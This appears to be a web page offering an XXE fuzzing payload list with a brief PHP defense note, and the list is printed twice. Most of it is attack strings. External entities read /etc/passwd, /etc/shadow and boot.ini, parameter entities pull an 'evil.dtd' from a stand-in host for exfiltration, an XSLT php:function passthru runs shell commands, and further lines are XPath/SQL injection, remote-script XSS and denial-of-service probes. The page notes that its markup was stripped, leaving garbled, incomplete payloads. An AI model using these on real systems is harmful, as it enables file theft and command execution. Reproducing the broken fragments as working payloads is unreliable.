XXE (XML external entity injection) attack and defense

Defense note (PHP): the DOCTYPE/ENTITY payloads below only resolve if the parser expands external entities, so never pass LIBXML_NOENT or LIBXML_DTDLOAD to DOMDocument::loadXML()/simplexml_load_string() on untrusted input, and on PHP < 8.0 call libxml_disable_entity_loader(true) first (PHP 8.0+ disables external entity loading by default). The XSLT payloads that call php:function() require XSLTProcessor::registerPHPFunctions() to have been enabled, and document('/etc/passwd') can be blocked with XSLTProcessor::setSecurityPrefs(). The file:////dev/random entries are denial-of-service probes (the read blocks), not data-exfiltration payloads.

Fuzzing (note: page extraction stripped the angle-bracket markup from every payload, so only the quoted attribute values and entity references survive below — the list is repeated twice and must be reconstructed before use, not copied verbatim)

 1 "php://filter/convert.base64-encode/resource=/etc/passwd">

2 "1.0" encoding="ISO-8859-1"?>
3 "aaaaaa">]>
4 "aaaaaa">]>&foo;
5 "1.0" encoding="ISO-8859-1"?>"aaaaaa">]>
6 "1.0" encoding="ISO-8859-1"?>"aaaaaa">]>< root>&foo;
7 "1.0" encoding="ISO-8859-1"?>
8 "1.0" encoding="ISO-8859-1"?>"file:///etc/passwd" >]>&xxe;
9 "1.0" encoding="ISO-8859-1"?>"file:///etc/passwd" >]>
10 "1.0" encoding="ISO-8859-1"?>"file:///etc/issue" >]>&xxe;
11 "1.0" encoding="ISO-8859-1"?>"file:///etc/issue" >]>
12 "1.0" encoding="ISO-8859-1"?>"file:///etc/shadow" >]>&xxe;
13 "1.0" encoding="ISO-8859-1"?>"file:///etc/shadow" >]>
14 "1.0" encoding="ISO-8859-1"?>"file:///c:/boot.ini" >]>&xxe;
15 "1.0" encoding="ISO-8859-1"?>"file:///c:/boot.ini" >]>
16 "1.0" encoding="ISO-8859-1"?>"http://example.com:80" >]>&xxe;
17 "1.0" encoding="ISO-8859-1"?>"http://example:443" >]>
18 "1.0" encoding="ISO-8859-1"?>"file:////dev/random">]>&xxe;
19
20 ]]>
21 &foo;
22 %foo;
23 count(/child::node())
24 x' or name()='username' or 'x'='y
25 ','')); phpinfo(); exit ;/*
26 var n=0;while(true){n++;}]]>
27 ]]>alert('XSS');]]>
28 "1.0" encoding="ISO-8859-1"?>]]>alert('XSS');]]>
29 ]]>alert('XSS');]]>
30 "1.0" encoding="ISO-8859-1"?>' or 1=1 or '' =']]>
31 ' or 1=1 or "=']]>
32 "javas]]>">]]>
33 "
xss"><IMG SRC= "javascript:alert('XSS')" >
"#xss" DATAFLD="B" DATAFORMATAS="HTML">
34 "xsstest.xml" ID=I>< /SPAN>
35
36 "
xsstest.xml" ID=I>
37 namespace="xss" implementation ="http://ha.ckers.org/xss.htc">XSS
38 namespace="xss" implementation ="http://ha.ckers.org/xss.htc">
39 "1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">"/">
40 "1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">"/">select="document('/etc/passwd')"/>
41 "1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">"/">select="php:function('passthru','ls -la')"/>
42 "file:///etc/passwd" >]>
43 "file:///etc/shadow" >]>
44 "file:///c:/boot.ini" >]>
45 "http://example.com/text.txt" >]>
46 "file:////dev/random">]>
47 int " "> %int;
48 " ">
49 "file:///etc/issue">"http://example.com/evil.dtd">%dtd;%trick;]>
50 "file:///c:/boot.ini">"http://example.com/evil.dtd">%dtd;%trick;]>
51 "http://xxxx:22/"> %dtd;]>]]>

 1 "php://filter/convert.base64-encode/resource=/etc/passwd">

2 "1.0" encoding="ISO-8859-1"?>
3 "aaaaaa">]>
4 "aaaaaa">]>&foo;
5 "1.0" encoding="ISO-8859-1"?>"aaaaaa">]>
6 "1.0" encoding="ISO-8859-1"?>"aaaaaa">]>< root>&foo;
7 "1.0" encoding="ISO-8859-1"?>
8 "1.0" encoding="ISO-8859-1"?>"file:///etc/passwd" >]>&xxe;
9 "1.0" encoding="ISO-8859-1"?>"file:///etc/passwd" >]>
10 "1.0" encoding="ISO-8859-1"?>"file:///etc/issue" >]>&xxe;
11 "1.0" encoding="ISO-8859-1"?>"file:///etc/issue" >]>
12 "1.0" encoding="ISO-8859-1"?>"file:///etc/shadow" >]>&xxe;
13 "1.0" encoding="ISO-8859-1"?>"file:///etc/shadow" >]>
14 "1.0" encoding="ISO-8859-1"?>"file:///c:/boot.ini" >]>&xxe;
15 "1.0" encoding="ISO-8859-1"?>"file:///c:/boot.ini" >]>
16 "1.0" encoding="ISO-8859-1"?>"http://example.com:80" >]>&xxe;
17 "1.0" encoding="ISO-8859-1"?>"http://example:443" >]>
18 "1.0" encoding="ISO-8859-1"?>"file:////dev/random">]>&xxe;
19
20 ]]>
21 &foo;
22 %foo;
23 count(/child::node())
24 x' or name()='username' or 'x'='y
25 ','')); phpinfo(); exit ;/*
26 var n=0;while(true){n++;}]]>
27 ]]>alert('XSS');]]>
28 "1.0" encoding="ISO-8859-1"?>]]>alert('XSS');]]>
29 ]]>alert('XSS');]]>
30 "1.0" encoding="ISO-8859-1"?>' or 1=1 or '' =']]>
31 ' or 1=1 or "=']]>
32 "javas]]>">]]>
33 "
xss"><IMG SRC= "javascript:alert('XSS')" >
"#xss" DATAFLD="B" DATAFORMATAS="HTML">
34 "xsstest.xml" ID=I>< /SPAN>
35
36 "
xsstest.xml" ID=I>
37 namespace="xss" implementation="http://ha.ckers.org/xss.htc">XSS
38 namespace="xss" implementation="http://ha.ckers.org/xss.htc">
39 "1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">"/">
40 "1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">"/">select="document('/etc/passwd')"/>
41 "1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">"/">select="php:function('passthru','ls -la')"/>
42 "file:///etc/passwd" >]>
43 "file:///etc/shadow" >]>
44 "file:///c:/boot.ini" >]>
45 "http://example.com/text.txt" >]>
46 "file:////dev/random">]>
47 int " "> %int;
48 "">
49 "file:///etc/issue">"http://example.com/evil.dtd">%dtd;%trick;]>
50 "file:///c:/boot.ini">"http://example.com/evil.dtd">%dtd;%trick;]>
51 "http://x.x.x.x:22/"> %dtd;]>]]>
